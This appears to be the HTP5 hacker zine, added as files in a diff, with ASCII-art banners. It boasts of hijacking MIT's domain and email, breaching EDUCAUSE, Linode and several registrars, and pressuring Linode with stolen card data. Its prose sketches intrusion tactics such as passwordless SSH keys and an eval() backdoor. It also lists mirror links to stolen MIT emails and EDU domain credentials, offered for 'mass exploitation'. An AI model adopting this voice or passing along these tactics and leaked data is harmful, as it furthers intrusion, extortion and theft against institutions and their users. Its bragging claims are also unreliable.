+                                    ░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
+                                  ░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
+                                   ▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
+                                  ░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
+                                 ▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
+                                 ███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
+                                ███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
+                               ▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
+                              ▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
+                             ░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+"What's the score?"                                                             
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+ ██ ██ ██  ██  █████                                                        HTP5
+ ██ ██ ██  ▄▄  ▄▄                                                               
+ ██ ▀▀ ██  ██  ██      FEATURING EDUCAUSE                                       
+▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+Back in January we decided to upstage Anonymous (again) and have a little fun   
+with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.  
+In doing so, we knew we had to make it very clear that it was an anti-Anonymous 
+deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus 
+why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH          
+ANONYMOUS." Despite all this, some of the cluebags in the media apparently      
+thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss 
+leejun y0!" Additionally, almost everybody missed the fact that it was a troll  
+deface, which just proves that it will be a few decades before we reach October 
+1st, 1993.                                                                      
+                                                                                
+MIT's reaction was particularly lulzy. They did a better job of reporting the   
+facts than all the media outlets, but they couldn't decide whether the e-mail   
+got intercepted or not. First, there was this from                              
+http://tech.mit.edu/V132/N62/hack.html:                                         
+                                                                                
+"Unlike previous attacks, which temporarily disabled some services, this attack 
+had the potential to be much more severe. A more calculated hacker could have   
+intercepted email messages intended for anyone at the MIT.edu domain, including 
+all alumni who use alum.mit.edu email addresses."                               
+                                                                                
+After having a day to do a better post-mortem, MIT started freaking out. They   
+published this: http://tech.mit.edu/V132/N63/hack.html. From that link:         
+                                                                                
+"Unlike previous attacks, which temporarily disabled some services, this attack 
+had the potential to be much more severe. Email was specifically affected. Mail 
+is normally received by one of nine different MIT servers; however today, mail  
+that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at     
+KAIST, Korea Advanced Institute of Science and Technology, meaning the          
+attackers had complete control of emails successfully sent during that time."   
+                                                                                
+We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail  
+when we see it :P. So who owned the domain? Well :                              
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+Domain Name: MIT.EDU                                                            
+                                                                                
+   Registrant:                                                                  
+      Massachusetts Institute of Technology                                     
+      Cambridge, MA 02139                                                       
+      UNITED STATES                                                             
+                                                                                
+   Administrative Contact:                                                      
+      I got owned                                                               
+      Massachusetts Institute of Technology                                     
+      MIT Room W92-167, 77 Massachusetts Avenue                                 
+      Cambridge, MA 02139-4307                                                  
+      UNITED STATES                                                             
+      (617) 324-1337                                                            
+      cunt@mit.edu                                                              
+                                                                                
+   Technical Contact:                                                           
+    OWNED NETWORK OPERATIONS                                                    
+      ROOT                                                                      
+      US                                                                        
+      DESTROYED, MA 02139-4307                                                  
+      UNITED STATES                                                             
+      (617) 253-1337                                                            
+      owned@mit.edu                                                             
+                                                                                
+   Name Servers:                                                                
+      FRED.NS.CLOUDFLARE.COM                                                    
+      KATE.NS.CLOUDFLARE.COM                                                    
+                                                                                
+   Domain record activated:    23-May-1985                                      
+   Domain record last updated: 22-Jan-2013                                      
+   Domain expires:             31-Jul-2013                                      
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                                                                                
+Here's the cherry on top:                                                       
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                                                                                
+From:   "CloudFlare Support" <support@cloudflare.com>                           
+Subject:        [CloudFlare Support] Pending request: Why is cloudflare staff   
+modifying my dns records? (ticket #12053)                                       
+Date:   Wed, January 23, 2013 4:48 pm                                           
+To:     "Fuckmit" <fuckmit@tormail.org>                                         
+                                                                                
+##- Please type your reply above this line -##                                  
+                                                                                
+[CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns  
+records? (ticket #12053)                                                        
+                                                                                
+This is an email to remind you that your request (#12053) is pending and awaits 
+your feedback.                                                                  
+                                                                                
+Please click the link below to review and update your request:                  
+http://support.cloudflare.com/tickets/12053                                     
+                                                                                
+----------------------------------------------                                  
+                                                                                
+Justin, Jan 22 11:48 am (PST)                                                   
+                                                                                
+Hi,                                                                             
+                                                                                
+We have reason to believe you are not the actual owner of the mit.edu domain.   
+We have been in contact with the actual owner this morning.                     
+                                                                                
+As such we have taken steps to secure the account, and the domain has already   
+been returned to the actual owner.                                              
+                                                                                
+----------------------------------------------                                  
+                                                                                
+Fuckmit, Jan 22 11:45 am (PST)                                                  
+                                                                                
+Two questions:                                                                  
+Why is cloudflare staff modifying my dns records without authorization?         
+Why is cloudflare staff repeatedly regenerating my API key every time they      
+decide to modify my dns records without authorization?                          
+                                                                                
+--------------------------------                                                
+This email is a service from CloudFlare Support                                 
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                                                                                
+You have reason to believe a user named 'Fuckmit' is not the legitimate owner   
+of mit.edu? Excellent deduction, Justin.                                        
+                                                                                
+Soon after, we decided to troll Gizmodo and the rest of the media into          
+preserving our access. The 'browser exploit' on MIT's NOC                       
+( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )   
+never existed. We'd never show our full hand at once, we'd just lose access.    
+                                                                                
+MIT certainly believed us though, despite their own reassurances otherwise. For 
+confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)      
+after finally asserting that we got access to their EDUCAUSE account.           
+                                                                                
+EDUCAUSE then made the fatal mistake of overlooking our complete access into    
+the EDU TLD. Though, we can't say we expect much from a registrar running ASPX  
+on their backend.                                                               
+                                                                                
+Now, just in case you don't believe us, we have entrusted the login credentials 
+of nearly every EDU domain to hackers worldwide (active as we speak) within the 
+MIT section of this zine. So, let's see what happens first, mass exploitation   
+or whitehat response? ;) We are not ones for defacing, actually, and we're      
+going to leave that up to the Internet Justice League (AKA Anonymous) if they   
+can even get to it on time. And we figure they'll manifest some statement       
+about how its morally justifiable to deface *.edu. We frankly don't care.       
+                                                                                
+By the end of today (5/6), EDU operation should return to normal.               
+                                                                                
+Moreover, we particularly enjoyed the fact that the first nameserver for        
+root-servers.org is an EDU domain. This effectively gave us control over        
+root-servers.org. However, ICANN is responsible for the root zones file.        
+                                                                                
+ICANN was already compromised by that time, though, joined by several of the    
+major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+        
+backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
+they used passwordless private keys stored on their servers to ssh into the     
+internal Juniper routers as superusers: only 3 networks away and not even phys  
+sep. Nothing proxychains can't handle. They probably should've checked their    
+netscreens before it was too late. :P                                           
+                                                                                
+None of this access was ever used, but we did get to see some pretty funny      
+shit. In the backbone of SourceForge (Savvis), for example, we ran into some    
+old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key  
+auth, and the kernels were fairly ancient (and in the absence of all file       
+transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's 
+served from port 43 - no file editing required). As it turns out, we were not   
+the first ones there. On their Phoenix, AZ stats server, some random hacker was 
+kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On  
+SourceForge's backbone -- LOL? We don't think he fully realized what he had     
+breached. Or maybe he just really needed a psyBNC server. Either way, he'll     
+probably have to end up getting a new psyBNC after today. On Github or          
+something.                                                                      
+                                                                                
+Enjoy the MIT emails/EDUCAUSE login data, included in this segment of           
+HTP5:                                                                           
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip                   
+|- 2.6GB | Zip compressed MIT emails                                            
+~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt            
+|- 28MB  | EDUCAUSE database: extracted domain credentials                      
+~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip      
+|- 12MB  | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup      
+~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt          
+|- 143K  | EDUCAUSE domain passwords, allow account/DNS modification.           
+|        | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt                      
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x02_Linode.txt

@@ -0,0 +1,133 @@
+▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░  ░     ░░  
+▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒     ░░░░░░░░░░░ ░░░░    ░░░░ 
+▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░                      ░░░░░░░░░░ ░  
+▓▓███▓▓▒███▄░▀▄▄  ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░                                ░░░░░▄▄▄▄▀▀
+▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒    ░░░░░░        ░    ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
+▒▒▓▓██████████▓▓▓▒▄▄  ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀  ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
+▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
+▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
+▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
+▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒  ▓███▒░░▒███▓
+▒▒░▒██▒▓██████   ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████   ▒████▓░░▓▓▓▓▒
+░▒░░▓█░░▒▒▓██▓   ░░░░ ░███████████████████▒░ ▄  ▄▄  ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
+░░░░▒█░░░░▒▓▓░░     ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░   
+░   ░█▒  ░░▒▒░░      ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓   ▓██████▓░░ ▓    
+░░   █▒    ▒▒         ░░░░▓█████████▒▒▒░░░░░░░░  ░░░░░░░▒███▒▒▒███████▓  ░ ▓    
+ ░░░ ▓▒  ▒ ░▒           ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░    ░░  ░░░  ▒▓▓▓▓▓███▓▒▒ ░░ ▓    
+ ░   ▓▒  ▒▒ ▒▒░            ░░░░░░░░░░░░░░░░░          ░░                ░ ▒▓    
+  ░ ░░▓  ░░ ░▒░░                   ░░  ░░░░░░        ░░░     ░░░░░  ░  ░▒ ▒     
+   ░░ ▓    ░░▒▒░░                  ░░ ░░░░░          ░░░░              ░▒ ▓     
+     ░▓      ░▒▒░░                ░░░ ░░      ░░░ ░░    ░              ▒ ▒░     
+      ▓▒    ░░▒▒░░░              ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀  ░             ▒ ▒      
+      ▒▓░░░░░░▒▒▒░░░░           ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░            ░▒ ▓      
+      ▒▓  ░░  ░▒▒░░░░░         ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░        ░▒ █░      
+       ▓░     ░▒▓▒░░░░░       ░░░▒▒▓▓▒▒▒▒▒▒▒░░     ░ ░░░▒▒▒██▒░    ░░▒░▒▒       
+       ▒▓     ░▒▓▓▒▒░░░░      ░░▒▒▒▒▒░░░░    ░░░░░░░░░ ░░ ░▒▓█▒    ░▒▒░▓        
+       ▒▓     ░ ▒▒▒▒▒░░░      ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒   ░▒▒▒▒▒        
+        ▒▒    ░   ▒▒▒░░░░     ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░  ░░▒▒░▒         
+        ▒▓    ░   ▒▒▒▒▒▒░░    ░▒▒░░░░  ░░░░          ░ ░░░  ░▒▒ ░░▒▒░ ▒         
+         ▒▒   ░    ▒▒▒▓▒▒░░    ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒         
+          ▓▒░▒░░   ░▒▒▓▓▒▒░░    ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒          
+        ░▒▓▓▒▒▒▒▒   ░▒▒▓▓▓▒▒░░░░░▒▓▒░  ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░         
+      ░▒▒▒▓▓▒▒▒▓▒░   ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░        
+    ░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░   ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░    
+  ░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░   ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒   ░▒▒▒▒▒░░░░░░ 
+ ░▒▒▒▒    ▒▒▓█▒▒▓▒░ ░ ░   ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░  ░▒▒▒▒▒▒░  ░░░
+▒▒▒▒░     ▒▒▒▒▓▒▓▓▒░   ░   ░░▒▓▓█████████▓▓▓▓███████████████▓▒░    ░▒▒▒▒▒▒░     
+▒▒░       ▒▒▒▒▒█▓▓▒▒        ░░▒▒▒██████████████████████████▓▒▒      ▒▒▒▒▒▒▒░░   
+▒        ░░░▒▒▒▓██▒▒▒ ░   ░    ░▒▒▒▓█████████████████████▓▒▒░ ░    ▒▒▒▒▒▒░░░ ░  
+░    ░   ░░░░▒▒▒▒▓█▒▒░░░        ░░░▒▒██████████████████▓▓▒▒░ ░    ░▒▒▒▒░░░░░ ░░ 
+░    ░  ░░░  ▒▒▒▒▒▒▓▓▒░░     ░     ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░       ░░▒▒▒░░░░░ ░░░░
+░    ░░░░░░  ░▒▒▒▒▒▒▒▓▒ ░            ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░      ░░░▒▒▒▒░░░░ ░░░░░
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+                                                      "I'm positive they owned."
+░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
+
+   ▄▄    ▄▄  ▄▄  ▄▄  ▄▄▄▄▄  ▄▄▄▄   ▄▄▄▄                                         
+   ██    ██  ███▄██  ██ ██  ██ ██  ██▄▄                                     HTP5
+   ██    ██  ██ ▀██  ██▄██  ██▄█▀  ██▄▄                                         
+   ██ ▄▄ ▄▄                                                                     
+▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+* Before reading this section of HTP5, we recommend you pop some popcorn.       
+                                                                                
+Following HTP4, we were promptly attacked by the next set of skids looking to   
+get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided 
+to take an alternative route, and located us through the development of one of  
+our botnets, Zodiac. We quickly switched into a fallback network and found out  
+they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.         
+                                                                                
+Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell  
+stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)  
+- HTP                                                                           
+                                                                                
+Linode turned out to be safe from our null RDS pass 1day (before Adobe had      
+released their critical advisory). In the meantime, their registrar (name.com)  
+was taken out. We acquired their domain login (along with StackOverflow,        
+DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.    
+                                                                                
+Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.    
+Back in November, we hinted at Huawei access in our Symantec release. Their     
+registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P 
+                                                                                
+However, right in time, our very own HTP zeroday research division manifested   
+subzero.py: a zeroday giving us a direct route into Linode. We proceeded to     
+breach Linode and acquire their in-memory keys. This allowed us to download     
+Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+       
+init=/bin/bash.                                                                 
+                                                                                
+Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,      
+Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5, 
+Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and     
+xnite were customers, but that's getting into another story.                    
+                                                                                
+Unknown to us at the time, the FBI had successfully accessed HTP. They made     
+their presence obvious, as everything we would get was burned within a few days.
+However, we merely considered it to be a leak, and waited to use Linode itself  
+to identify the source.                                                         
+                                                                                
+Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly  
+identifying themselves as the source of the leaks within HTP. We still          
+considered it a leak, and told Linode that if they did not act upon our         
+already-gained access by 5/1, we would shred all of our Linode-related data.    
+This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH      
+usernames, plaintext LiSH passwords, and employee logins. In the case of        
+noncompliance, we stated that we would drop it all in our release.              
+                                                                                
+This was actually quite a good offer. We made it because we didn't care about   
+CCs to begin with (that's directed at everyone on Twitter blaming Linode for    
+identity theft) and because our primary target was SwiftIRC, not Linode. They   
+accepted to protect their customer data/CCs (there wasn't much choice).         
+                                                                                
+The FBI got pissed off by this development and forced Linode's hand. After      
+informing them we would follow through and shred all of our Linode data within a
+week, the FBI and Linode coordinated a release detailing the breach in an email 
+to their customers. We were confused. If they just did this on 5/1, nothing     
+would be affected? Apparently, the FBI did not trust us. We soon found out      
+Linode's situation was not voluntary.                                           
+                                                                                
+Linode was between a rock and a hard place. They had to comply with the FBI     
+(immediately), but doing so would mean all 159,000+ customers would be on Full  
+Disclosure by 5/1. Recognizing their situation, we instead told them that if    
+they acknowledged HTP in their analysis, we'd go ahead and shred their customer 
+data anyway. Readily enabling carders was never part of our plan. They agreed,  
+and we proceeded to delete our copies of the data for them.                     
+                                                                                
+There was one more loose end to tie. We identified which users on HTP were      
+involved with the FBI, and promptly gained access to one of their cams. Sure    
+enough, there was a handler standing behind him, monitoring his involvement     
+in HTP (hi!).                                                                   
+                                                                                
+The FBI lost their access into HTP.                                             
+                                                                                
+So what's in this release, if not Linode? EDIT: Hahaha we guess that was too    
+hot, we'll give you guys registrar data instead.                                
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png                         
+|- 193K | Linode blog post screenshot 1                                         
+~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png                         
+|- 179K | Linode blog post screenshot 2                                         
+~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt               
+|- 70K | Data on the registars mentioned above.                                 
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x03_Nmap.txt

@@ -0,0 +1,126 @@
+                                                                                
+                                                                                
+                                                   ░░░░                         
+                                         ░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░                  
+                                      ░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░              
+                                   ░░▒▒▒▒░░               ░░░▒▒░░▒░░            
+                                ░░░░░▒░░                     ░░▒▒░░░▒░          
+                              ░░░░░▒░░░                        ░░▒░░░░░░        
+                            ░░░▒░▒░▒░░                          ░▒▒░░░░▒░░      
+                          ░░░░▒▒▒░▓▒░▒░                         ░░▒░░░░░░▒░     
+                        ░░░░░░▓█▓█▓▒░░░                        ░░▒░░░░░░░░▒░    
+                      ░░░░░░▒▓████▓▒▒░░                ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░   
+                    ░░░░░░░▒▒███▓▓░░░         ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░  
+                  ░░░░░░▒▒░░░▓█▓▒░▒          ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░  
+                 ░░░░░░▒▒░▒▒▒░▒▓▒░           ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░ 
+               ░░░░░░░░░░▓▓▒▓▒░░░           ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░ 
+              ░░░░░░░░▒░▒░░░▒▓▒░░          ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░ 
+             ░░░░░░░░░░▒▒░░▓█▓▒░         ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░  
+             ░░░░░░░░░░░▒░▒▒▓░░░░       ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░  
+            ░░░░░░░░░░░▒░░▒▒▒░░░░░░  ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░   
+           ░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░   
+          ░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░    
+         ░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░    
+       ░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░    
+    ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░    
+  ░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░     
+░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░      
+░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░       
+░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░        
+░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░         
+░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░           
+░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░            
+▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░             
+░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░              
+▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░               
+░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░                
